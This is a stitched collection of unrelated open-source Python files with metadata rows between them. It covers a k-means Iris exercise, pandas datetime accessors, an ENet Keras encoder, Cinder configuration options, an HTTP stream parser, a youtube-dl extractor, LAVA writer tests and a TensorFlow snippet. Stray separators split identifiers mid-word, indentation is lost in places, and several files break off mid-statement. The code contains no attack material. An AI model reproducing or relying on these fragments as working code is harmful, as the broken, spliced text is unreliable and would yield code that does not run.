Created on Wed Oct 18 20:53:35 2017
@author: sitibanc
"""
import numpy as np
import random
from sklearn import datasets
from scipy import stats
def kmeans(sample, K, max_iter):
N = sample.shape[0] # N筆資料
D = sample.shape[1] # 每筆資料有N維
C = np.zeros((K, D)) # K個中心點
L = np.zeros((N, 1)) # Label (data屬於哪一個cluster)
L1 = np.zeros((N, 1)) # 重新分群計算出的label
dist = np.zeros((N, K))
# Random select center
idx = random.sample(range(N), K)
C = sample[idx, :]
iteration = 0
while iteration <= max_iter:
for i in range(K):
#以整個矩陣做運算,求與C(中心點)距離
# np.tile() --> 垂直Repeat C[i, :] N次,水平repeat 1次
dist[:, i] = np.sum((sample - np.tile(C[i, :], (N, 1))) ** 2 , 1)
# 取距離最短者的input為其label
L1 = np.argmin(dist, 1)
# 若分群後各群成員不再改變(已分完,所屬cluster已定),則跳出迴圈
if iteration > 0 and np.array_equal(L, L1):
break
# Update Label L
L = L1
# 計算重新分群後的新center
for i in range(K):
# 取出屬於第i群者的index
idx = np.nonzero(L == i)[0] # np.nonzero()亦即True
if len(idx) > 0:
C[i, :] = np.mean(sample[idx, :], 0) # 沿垂直方向(0)計算平均
iteration += 1
# Calcuate wicd(within cluster distance, 群內每筆資料與群中心的距離)
wicd = np.sum(np.sqrt(np.sum((sample - C[L, :]) ** 2 , 1)))
return C, L, wic
|
d
# Practice 3 : Iris Dataset Clustering Using K-Means
data = datasets.load_iris()
feature = data.data
center, label, wicd = kmeans(feature, 3, 1000)
# Calculate Error Rate
error = 0
for i in range(len(label)):
if i < 50:
mode = stats.mode(label[:50])
if label[i] != mode[0][0]:
error += 1
elif i < 100:
mode = stats.m
|
ode(label[50:100])
if label[i] != mode[0][0]:
error += 1
else:
mode = stats.mode(label[100:])
if label[i] != mode[0][0]:
error += 1
print('Error rate :', error / len(label))
|
Intelworks/OpenTAXII
|
opentaxii/exceptions.py
|
Python
|
bsd-3-clause
| 157
| 0
|
from .taxii
|
.exceptions import UnauthorizedStatus
class UnauthorizedException(UnauthorizedStatus):
pass
|
class InvalidAuthHeader(Exception):
pass
|
Ouranosinc/Magpie
|
magpie/api/__init__.py
|
Python
|
apache-2.0
| 329
| 0
|
from magpie.utils import get_logger
LOGGER = get_logger(__name__)
def includeme(config):
LOGGER.info("Adding API routes...")
# Add all the admin ui routes
config.include("magp
|
ie.api.home")
config.include("magpie.api.login")
config.include("magpie.api.management")
config.include("mag
|
pie.api.swagger")
|
syncloud/platform
|
src/syncloud_platform/rest/model/user.py
|
Python
|
gpl-3.0
| 67
| 0
|
class Use
|
r:
def __init__(self, name):
self.name = n
|
ame
|
dsm054/pandas
|
pandas/core/indexes/accessors.py
|
Python
|
bsd-3-clause
| 14,627
| 0.001641
|
"""
datetimelike delegation
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer_dtype,
is_list_like,
is_period_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.accessor import (
PandasDelegate,
delegate_names,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
)
from pandas.core.base import (
NoNewAttributesMixin,
PandasObject,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
if TYPE_CHECKING:
from pandas import Series
class Properties(PandasDelegate, PandasObject, NoNewAttributesMixin):
_hidden_attrs = PandasObject._hidden_attrs | {
"orig",
"name",
}
def __init__(self, data: Series, orig):
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
self._parent = data
self.orig = orig
self.name = getattr(data, "name", None)
self._freeze()
def _get_values(self):
data = self._parent
if is_datetime64_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaIndex(data, copy=False, name=self.name)
elif is_period_dtype(data.dtype):
return PeriodArray(data, copy=False)
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
def _delegate_property_get(self, name):
from pandas import Series
values = self._get_values()
result = getattr(values, name)
# maybe need to upcast (ints)
if isinstance(result, np.ndarray):
if is_integer_dtype(result):
result = result.astype("int64")
elif not is_list_like(result):
return result
result = np.asarray(result)
if self.orig is not None:
index = self.orig.index
else:
index = self._parent.index
# return the result as a Series, which is by definition a copy
result = Series(result, index=index, name=self.name).__finalize__(self._parent)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a property of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
def _delegate_property_set(self, name, value, *args, **kwargs):
raise ValueError(
"modifications to a property of a datetimelike object are not supported. "
"Change values on the original."
)
def _delegate_method(self, name, *args, **kwargs):
from pandas import Series
values = self._get_values()
method = getattr(values, name)
result = method(*args, **kwargs)
if not is_list_like(result):
return result
result = Series(result, index=self._parent.index, name=self.name).__finalize__(
self._parent
)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a method of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_methods, typ="method"
)
class DatetimeProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Examples
--------
>>> seconds_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="s"))
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
dtype: datetime64[ns]
>>> seconds_series.dt.second
0 0
1 1
2 2
dtype: int64
>>> hours_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="h"))
>>> hours_series
0 2000-01-01 00:00:00
1 2000-01-01 01:00:00
2 2000-01-01 02:00:00
dtype: datetime64[ns]
>>> hours_series.dt.hour
0 0
1 1
2 2
dtype: int64
>>> quarters_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="q"))
>>> quarters_series
0 2000-03-31
1 2000-06-30
2 2000-09-30
dtype: datetime64[ns]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
dtype: int64
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
"""
def to_pydatetime(self) -> np.ndarray:
"""
Return the data as an array of native Python datetime objects.
Timezone information is retained if present.
.. warning::
Python's datetime uses microsecond resolution, which is lower than
pandas (nanosecond). The values are truncated.
Returns
-------
numpy.ndarray
Object dtype array containing native Python datetime objects.
See Also
--------
datetime.datetime : Standard library value for a datetime.
Examples
--------
>>> s = pd.Series(pd.date_range('20180310', periods=2))
>>> s
0 2018-03-10
1 2018-03-11
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 11, 0, 0)], dtype=object)
pandas' nanosecond precision is truncated to microseconds.
>>> s = pd.Series(pd.date_range('20180310', periods=2, freq='ns'))
>
|
>> s
0 2018-03-10 00:00:00.000000000
1 2018-03-10 00:00:00.000000001
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 10, 0, 0)], dtype=object)
"""
return self._get_values().to_pydatetime()
@property
def freq(self):
return self._g
|
et_values().inferred_freq
def isocalendar(self):
"""
Returns a DataFrame with the year, week, and day calculated according to
the ISO 8601 standard.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
with columns year, week and day
See Also
--------
Timestamp.isocalendar : Function return a 3-tuple containing ISO year,
week number, and weekday for the given Timestamp object.
datetime.date.isocalendar : Return a named tuple object with
three components: year, week and weekday.
Examples
--------
>>> ser = pd.to_datetime(pd.Series(["2010-01-01", pd.NaT]))
>>> ser.dt.isocalendar()
year week day
0 2009 53 5
1 <NA> <NA> <NA>
>>> ser.dt.isocalendar().week
0 53
1 <NA>
Name: week, dtype: UInt32
"""
return self._get_values().isocalendar().set_index(self._parent.index)
@property
def weekofyear(self):
"""
The week ordinal of the year.
.. deprecated:: 1.1.0
Series.dt.weekofyear and Series.dt.week have been deprecated.
Please use Series.dt.isocalendar().week instead.
"""
warnings.warn(
"Series.dt.weekofyear and Series.dt.week have been deprecated. "
"Please use Series.dt.isocalendar().week instead.",
FutureWarning,
|
PavlosMelissinos/enet-keras
|
src/models/enet_unpooling/encoder.py
|
Python
|
mit
| 4,098
| 0.00366
|
# coding=utf-8
from keras.layers.advanced_activations import PReLU
from keras.layers.convolutional import Conv2D, ZeroPadding2D
from keras.layers.core import SpatialDropout2D, Permute
from keras.layers.merge import add, concatenate
from keras.layers.normalization import BatchNormalization
from ..layers.pooling import MaxPoolingWithArgmax2D
def initial_block(inp, nb_filter=13, nb_row=3, nb_col=3, strides=(2, 2)):
conv = Conv2D(nb_filter, (nb_row, nb_col), padding='same', strides=strides)(inp)
max_pool, indices = MaxPoolingWithArgmax2D()(inp)
merged = concatenate([conv, max_pool], axis=3)
return merged, indices
def bottleneck(inp, output, internal_scale=4, asymmetric=0, dilated=0, downsample=False, dropout_rate=0.1):
# main branch
internal = output // internal_scale
encoder = inp
# 1x1
input_stride = 2 if downsample else 1 # the 1st 1x1 projection is replaced with a 2x2 convolution when downsampling
encoder = Conv2D(internal, (input_stride, input_stride),
# padding='same',
strides=(input_stride, input_stride), use_bias=False)(encoder)
# Batch normalization + PReLU
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# conv
if not asymmetric and not dilated:
encoder = Conv2D(internal, (3, 3), padding='same')(encoder)
elif asymmetric:
encoder = Conv2D(internal, (1, asymmetric), padding='same', use_bias=False)(encoder)
encoder = Conv2D(internal, (asymmetric, 1), padding='same')(encoder)
elif dilated:
encoder = Conv2D(internal, (3, 3), dilation_rate=(dilated, dilated), padding='same')(encoder)
else:
raise(Exception('You shouldn\'t be here'))
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = PReLU(shared_axes=[1, 2])(encoder)
# 1x1
encoder = Conv2D(output, (1, 1), use_bias=False)(encoder)
encoder = BatchNormalization(momentum=0.1)(encoder) # enet_unpooling uses momentum of 0.1, keras default is 0.99
encoder = SpatialDropout2D(dropout_rate)(encoder)
other = inp
# other branch
if downsample:
other, indices = MaxPoolingWithArgmax2D()(other)
other = Permute((1, 3, 2))(other)
pad_feature_maps = output - inp.get_shape().as_list()[3]
tb_pad = (0, 0)
lr_pad = (0, pad_feature_maps)
other = ZeroPadding2D(padding=(tb_pad, lr_pad))(other)
other = Permute((1, 3, 2))(other)
encoder = add([encoder, other])
encoder = PReLU(shared_axes=[1, 2])(encoder)
if downsample:
return encoder, indices
else:
return encoder
def build(inp, dropout_rate=0.01):
pooling_indices = []
enet, indices_single = initial_block(inp)
enet = BatchNormalization(momentum=0.1)(enet) # enet_unpooling uses momentum of 0.1, keras default is 0.99
enet = PReLU(shared_axes=[1, 2])(enet)
pooling_indices.append(indices_single)
enet, indices_single = bottleneck(enet, 64, downsample=True, dropout_rate=dropout_rate) # bottleneck 1.0
pooling_indices.append(indices_single)
for _ in range(4):
enet = bottleneck(enet, 64, dropout_rate=dropout_rate) # bottleneck 1.i
enet, indices_single = bottleneck(enet, 128, downsample=True) # bottleneck 2.0
pooling_indices.append(indices_single)
# bottlen
|
eck 2.x and 3.x
for _ in range(2):
enet = bottleneck(enet, 128) # bottleneck 2.1
enet = bottleneck(enet, 128, dilated=2) # bottleneck 2.2
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.3
enet = bottleneck(enet, 128, dilated=4) # bottleneck 2.4
enet = bottleneck(enet, 128) # bottleneck 2.5
enet = bottl
|
eneck(enet, 128, dilated=8) # bottleneck 2.6
enet = bottleneck(enet, 128, asymmetric=5) # bottleneck 2.7
enet = bottleneck(enet, 128, dilated=16) # bottleneck 2.8
return enet, pooling_indices
|
saeki-masaki/cinder
|
cinder/common/config.py
|
Python
|
apache-2.0
| 9,037
| 0
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 NTT corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Command-line flag library.
Emulates gflags by wrapping cfg.ConfigOpts.
The idea is to move fully to cfg eventually, and this wrapper is a
stepping stone.
"""
import socket
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import netutils
from cinder.i18n import _
CONF = cfg.CONF
logging.register_options(CONF)
core_opts = [
cfg.StrOpt('api_paste_config',
default="api-paste.ini",
help='File name for the paste.deploy config for cinder-api'),
cfg.StrOpt('state_path',
default='/var/lib/cinder',
deprecated_name='pybasedir',
help="Top-level directory for maintaining cinder's state"), ]
debug_opts = [
]
CONF.register_cli_opts(core_opts)
CONF.register_cli_opts(debug_opts)
global_opts = [
cfg.StrOpt('my_ip',
default=netutils.get_my_ipv4(),
help='IP address of this host'),
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance host name or IP'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port'),
cfg.ListOpt('glance_api_servers',
default=['$glance_host:$glance_port'],
help='A list of the glance API servers available to cinder '
'([hostname|ip]:port)'),
cfg.IntOpt('glance_api_version',
default=1,
help='Version of the glance API to use'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number retries when downloading an image from glance'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance'),
cfg.BoolOpt('glance_api_ssl_compression',
default=False,
help='Enables or disables negotiation of SSL layer '
'compression. In some cases disabling compression '
'can improve data throughput, such as when high '
'network bandwidth is available and you use '
'compressed image formats like qcow2.'),
cfg.StrOpt('glance_ca_certificates_file',
help='Location of ca certificates file to use for glance '
'client requests.'),
cfg.IntOpt('glance_request_timeout',
default=None,
help='http/https timeout value for glance operations. If no '
'value (None) is supplied here, the glanceclient default '
'value is used.'),
cfg.StrOpt('scheduler_topic',
default='cinder-scheduler',
help='The topic that scheduler nodes listen on'),
cfg.StrOpt('volume_topic',
default='cinder-volume',
help='The topic that volume nodes listen on'),
cfg.StrOpt('backup_topic',
default='cinder-backup',
help='The topic that volume backup nodes listen on'),
cfg.BoolOpt('enable_v1_api',
default=True,
help=_("DEPRECATED: Deploy v1 of the Cinder API.")),
cfg.BoolOpt('enable_v2_api',
default=True,
help=_("Deploy v2 of the Cinder API.")),
cfg.BoolOpt('api_rate_limit',
default=True,
help='Enables or disables rate limit of the API.'),
cfg.ListOpt('osapi_volume_ext_list',
default=[],
help='Specify list of extensions to load when using osapi_'
'volume_extension option with cinder.api.contrib.'
'select_extensions'),
cfg.MultiStrOpt('osapi_volume_extension',
default=['cinder.api.contrib.standard_extensions'],
help='osapi volume extension to load'),
cfg.StrOpt('volume_manager',
default='cinder.volume.manager.VolumeManager',
help='Full class name for the Manager for volume'),
cfg.StrOpt('backup_manager',
default='cinder.backup.manager.BackupManager',
help='Full class name for the Manager for volume backup'),
cfg.StrOpt('scheduler_manager',
default='cinder.scheduler.manager.SchedulerManager',
help='Full class name for the Manager for scheduler'),
cfg.StrOpt('host',
default=socket.gethostname(),
help='Name of this node. This can be an opaque identifier. '
'It is not necessarily a host name, FQDN, or IP address.'),
# NOTE(vish): default to nova for compatibility with nova installs
cfg.StrOpt('storage_availability_zone',
default='nova',
help='Availability zone of this node'),
cfg.StrOpt('default_availability_zone',
default=None,
help='Default availability zone for new volumes. If not set, '
'the storage_availability_zone option value is used as '
'the default for new volumes.'),
cfg.StrOpt('default_volume_type',
default=None,
help='Default volume type to use'),
cfg.StrOpt('volume_usage_audit_period',
default='month',
help='Time period for which to generate volume usages. '
'The options are hour, day, month, or year.'),
cfg.StrOpt('rootwrap_config',
default='/etc/cinder/rootwrap.conf',
help='Path to the rootwrap configuration file to use for '
'running commands as root'),
cfg.BoolOpt('monkey_patch',
default=False,
help='Enable monkey patching'),
cfg.ListOpt('monkey_patch_modules',
default=[],
help='List of modules/decor
|
ators to monkey patch'),
cfg.IntOpt('service_down_time',
default=60,
help='Maximum time since last check-in for a service to be '
'considered up'),
cfg.StrOpt('volume_api_class',
default='cinder.volume.api.API',
help='The full class name of the vol
|
ume API class to use'),
cfg.StrOpt('backup_api_class',
default='cinder.backup.api.API',
help='The full class name of the volume backup API class'),
cfg.StrOpt('auth_strategy',
default='keystone',
choices=['noauth', 'keystone', 'deprecated'],
help='The strategy to use for auth. Supports noauth, keystone, '
'and deprecated.'),
cfg.ListOpt('enabled_backends',
default=None,
help='A list of backend names to use. These backend names '
'should be backed by a unique [CONFIG] group '
'with its options'),
cfg.BoolOpt('no_snapshot_gb_quota',
default=False,
help='Whether snapshots count against gigabyte quota'),
cfg.StrOpt('transfer_api_class',
default='cinder.transfer.api.API',
help='The full class name of the volume transfer API class'),
cfg.StrOpt('replication_api_class',
default='cinder.replication.api.API',
help='The full class name of the volume replication API class'),
cfg.StrOpt('consistenc
|
robertsj/poropy
|
pyqtgraph/dockarea/__main__.py
|
Python
|
mit
| 1,587
| 0.018904
|
import sys
## Make sure pyqtgraph is importable
p = os.path.dirname(os.path.abspath(__file__))
p = os.path.join(p, '..', '..')
sys.path.insert(0, p)
from pyqtgraph.Qt import QtCore, QtGui
from DockArea import *
from Dock import *
app = QtGui.QApplication([])
win = QtGui.QMainWindow()
area = DockArea()
win.setCentralWidget(area)
win.resize(800,800)
from Dock import Dock
d1 = Dock("Dock1", size=(200,200))
d2 = Dock("Dock2", size=(100,100))
d3 = Dock("Dock3", size=(1,1))
d4 = Dock("Dock4", size=(50,50))
d5 = Dock("Dock5", size=(100,100))
d6 = Dock("Dock6", size=(300,300))
area.addDock(d1, 'left')
area.addDock(d2, 'right')
area.addDock(d3, 'bottom')
area.addDock(d4, 'right')
area.addDock(d5, 'left', d1)
area.addDock(d6, 'top', d4)
area.moveDock(d6, 'above', d4)
d3.hideTitleBar()
print "===build complete===="
for d in [d1, d2, d3, d4, d5]:
w = QtGui.QWidget()
l = QtGui.QVBoxLayout()
w.setLayout(l)
btns = []
for i in range(4):
btns.append(QtGui.QPushButton("%s Button %d"%(d.name(), i)))
|
l.addWidget(btns[-1])
d.w = (w, l, btns)
d.addWidget(w)
import pyqtgraph as pg
p = pg.PlotWidget()
d6.addWidget(p)
print "===widgets added==="
#s = area.saveState()
#print "\n\n-------restore----------\n\n"
#area.restoreState(s)
s = None
def save():
global s
s = area.saveState()
def load():
global s
area.restoreState(s)
#d6.container().setCurrentIndex(0)
#d2.label.setTabPos(40)
#win2 = QtGui.QMainWindow()
#area2 = DockArea()
|
#win2.setCentralWidget(area2)
#win2.resize(800,800)
win.show()
#win2.show()
|
7senses/shaka
|
shaka.py
|
Python
|
gpl-2.0
| 15,841
| 0.003283
|
import socket
import json
import sys, traceback
import redis
class http_parser:
def __init__(self, sfhttp, is_client = True):
self.__METHOD = 0
self.__RESP = 1
self.__HEADER = 2
self.__BODY = 3
self.__TRAILER = 4
self.__CHUNK_LEN = 5
self.__CHUNK_BODY = 6
self.__CHUNK_END = 7
self._sfhttp = sfhttp
self._is_client = is_client
if is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
self._data = []
self.result = []
self._ip = ''
self._port = ''
self._peer_ip = ''
self._peer_port = ''
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
self.__is_error = False
def in_data(self, data, header):
if self.__is_error:
return
if self._ip == '' or self._port == '':
if header['from'] == '1':
self._ip = header['ip1']
self._port = header['port1']
self._peer_ip = header['ip2']
self._peer_port = header['port2']
elif header['from'] == '2':
self._ip = header['ip2']
self._port = header['port2']
self._peer_ip = header['ip1']
self._peer_port = header['port1']
self._data.append(data)
try:
self._parse(header)
except Exception:
self.__is_error = True
print('parse error:', file=sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print("*** extract_tb:", file=sys.stderr)
print(repr(traceback.extract_tb(exc_traceback)), file=sys.stderr)
print("*** format_tb:", file=sys.stderr)
print(repr(traceback.format_tb(exc_traceback)), file=sys.stderr)
print("*** tb_lineno:", exc_traceback.tb_lineno, file=sys.stderr)
def _push_data(self):
result = {}
if self._is_client:
if self._method == {}:
self.__is_error = True
return
result['method'] = self._method
else:
if self._response == {}:
self.__is_error = True
return
result['response'] = self._response
result['header'] = self._header
result['trailer'] = self._trailer
result['ip'] = self._ip
result['port'] = self._port
self.result.append(result)
self._method = {}
self._response = {}
self._resp = {}
self._header = {}
self._trailer = {}
self._length = 0
self._remain = 0
def _parse(self, header):
while True:
if self._state == self.__METHOD:
if not self._parse_method():
break
elif self._state == self.__RESP:
if not self._parse_response():
break
elif self._state == self.__HEADER:
if not self._parse_header(header):
break
elif self._state == self.__BODY:
self._skip_body()
if self._remain > 0:
break
elif self._state == self.__CHUNK_LEN:
if not self._parse_chunk_len():
break
elif self._state == self.__CHUNK_BODY:
self._skip_body()
if self._remain > 0:
break
self._state = self.__CHUNK_LEN
elif self._state == self.__CHUNK_END:
self._skip_body()
if self._remain > 0:
break
self._state = self.__TRAILER
else:
break
def _parse_chunk_len(self):
(result, line) = self._read_line()
if result:
self._remain = int(line.split(b';')[0], 16) + 2
self._state = self.__CHUNK_BODY
if self._remain == 2:
self._s
|
tate = sel
|
f.__CHUNK_END
return True
else:
return False
def _parse_trailer(self):
(result, line) = self._read_line()
if result:
if len(line) == 0:
if self._is_client:
self._state = self.__METHOD
else:
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
self._trailer[sp[0].decode('utf-8')] = val
return True
else:
return False
def _parse_method(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._method['method'] = sp[0].decode('utf-8')
self._method['uri'] = sp[1].decode('utf-8')
self._method['ver'] = sp[2].decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_response(self):
(result, line) = self._read_line()
if result:
sp = line.split(b' ')
self._response['ver'] = sp[0].decode('utf-8')
self._response['code'] = sp[1].decode('utf-8')
self._response['msg'] = (b' '.join(sp[2:])).decode('utf-8')
self._state = self.__HEADER
return True
else:
return False
def _parse_header(self, sftap_header):
(result, line) = self._read_line()
if result:
if line == b'':
if 'content-length' in self._header:
self._remain = int(self._header['content-length'])
if self._remain > 0:
self._state = self.__BODY
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
elif ('transfer-encoding' in self._header and
self._header['transfer-encoding'].lower() == 'chunked'):
self._state = self.__CHUNK_LEN
elif self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
sp = line.split(b': ')
val = (b': '.join(sp[1:])).decode('utf-8')
val = val.strip()
ctype = sp[0].decode('utf-8').lower()
if ctype == 'content-type' and val.split('/')[0] == 'video':
self._sfhttp.input_video(val, sftap_header,
self._ip, self._port,
self._peer_ip, self._peer_port)
self._header[sp[0].decode('utf-8').lower()] = val
return True
else:
return False
def _skip_body(self):
while len(self._data) > 0:
num = sum([len(x) for x in self._data[0]])
if num <= self._remain:
self._data.pop(0)
self._remain -= num
if self._remain == 0:
if self._is_client:
self._push_data()
self._state = self.__METHOD
else:
self._push_data()
self._state = self.__RESP
else:
while True:
num = len(self._data[0][
|
valmynd/MediaFetcher
|
src/plugins/youtube_dl/youtube_dl/extractor/drbonanza.py
|
Python
|
gpl-3.0
| 1,678
| 0.026222
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
js_to_json,
parse_duration,
unescapeHTML,
)
class DRBonanzaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/bonanza/[^/]+/\d+/[^/]+/(?P<id>\d+)/(?P<display_id>[^/?#&]+)'
_TEST = {
'url': 'http://www.dr.dk/bonanza/serie/154/matador/40312/matador---0824-komme-fremmede-',
'info_dict': {
'id': '40312',
'display_id': 'matador---0824-komme-fremmede-',
'ext': 'mp4',
'title': 'MATADOR - 08:24. "Komme fremmede".'
|
,
'description': 'md5:77b4c1ac4d4c1b9d610ab4395212ff84',
'thumbnail': r're:^https?://.*\.(?:gif|jpg)$',
'duration': 4613,
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id, display_id = mobj.group('id', 'display_id')
webpage = self._download_webpage(url, display_id)
info = self._parse_html5_
|
media_entries(
url, webpage, display_id, m3u8_id='hls',
m3u8_entry_protocol='m3u8_native')[0]
self._sort_formats(info['formats'])
asset = self._parse_json(
self._search_regex(
r'(?s)currentAsset\s*=\s*({.+?})\s*</script', webpage, 'asset'),
display_id, transform_source=js_to_json)
title = unescapeHTML(asset['AssetTitle']).strip()
def extract(field):
return self._search_regex(
r'<div[^>]+>\s*<p>%s:<p>\s*</div>\s*<div[^>]+>\s*<p>([^<]+)</p>' % field,
webpage, field, default=None)
info.update({
'id': asset.get('AssetId') or video_id,
'display_id': display_id,
'title': title,
'description': extract('Programinfo'),
'duration': parse_duration(extract('Tid')),
'thumbnail': asset.get('AssetImageUrl'),
})
return info
|
free-electrons/custom_tests_tool
|
tests/test_writers.py
|
Python
|
gpl-2.0
| 4,332
| 0.000462
|
from nose.tools import assert_equal, assert_raises
import mock
import xmlrpc
from src.writers import FileWriter, LavaWriter
from src.writers import UnavailableError
class TestFileWriter(object):
OUTPUT_DIR = 'foo'
CONTENT = 'test'
NAME = 'test-job-name'
def test_fail_open(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open()
with mock.patch('builtins.open', mo, create=True) as mocked:
mocked.side_effect = IOError
writer = FileWriter(cfg)
assert_raises(UnavailableError, writer.write, dict(),
self.NAME, self.CONTENT)
def test_write(self):
cfg = {
'output_dir': self.OUTPUT_DIR,
}
mo = mock.mock_open(read_data=self.CONTENT)
with mock.patch('
|
builtins.open', mo, create=True) as mocked:
path = '%s/%s.yaml' % (self.OUTPUT_DIR, self.NAME)
mocked_file = mocked.return_value
writer = FileWriter(cfg)
results = writer.write(dict(), self.NAME, self.CONTENT)
mocked.assert_called_once_with(path, 'w')
mocked_file
|
.write.assert_called_with(self.CONTENT)
assert_equal(results, [path])
class TestLavaWriter(object):
DEVICE_TYPE = 'foo_bar'
CONTENT = 'test'
NAME = 'test-job-name'
UI_ADDRESS = 'http://webui.example.org'
@mock.patch('xmlrpc.client.ServerProxy')
def test_connection_error(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock.side_effect = xmlrpc.client.Error
assert_raises(UnavailableError, LavaWriter, cfg)
@mock.patch('xmlrpc.client.ServerProxy')
def test_device_offline(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
}
response = {
'status': 'offline',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.get_device_status.return_value = response
writer = LavaWriter(cfg)
assert_raises(UnavailableError, writer.write, board,
self.NAME, self.CONTENT)
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_unique(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = 42
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42)])
@mock.patch('xmlrpc.client.ServerProxy')
def test_write_multiple(self, mock):
board = {
'device_type': self.DEVICE_TYPE,
}
cfg = {
'server': 'https://test.example.org/RPC2',
'username': 'foobar',
'token': 'deadcoffee42',
'web_ui_address': self.UI_ADDRESS,
}
response = {
'status': 'online',
}
mock_proxy = mock.return_value
mock_proxy.scheduler.submit_job.return_value = (42, 84)
writer = LavaWriter(cfg)
results = writer.write(board, self.NAME, self.CONTENT)
mock_proxy.scheduler.get_device_status.assert_called_with('%s_01' % self.DEVICE_TYPE)
mock_proxy.scheduler.submit_job.assert_called_with(self.CONTENT)
assert_equal(results, ['%s/scheduler/job/%d' % (self.UI_ADDRESS, 42),
'%s/scheduler/job/%d' % (self.UI_ADDRESS, 84)])
|
ghost9023/DeepLearningPythonStudy
|
DeepLearning/DeepLearning/02_Deep_ChoTH/tensorflow_prac.py
|
Python
|
mit
| 18,788
| 0.011447
|
##### 텐서 딥러닝 1장
import tensorflow as tf
hello = tf.constant('Hello, Tensorflow')
sess = tf.Session()
print(sess.run(hello))
# 'b'는 bytes literals라는 뜻이다.
node1 = tf.constant(3.0, tf.float32) # 숫자, 데이터타입
node2 = tf.constant(4.0) # 숫자, 데이터타입
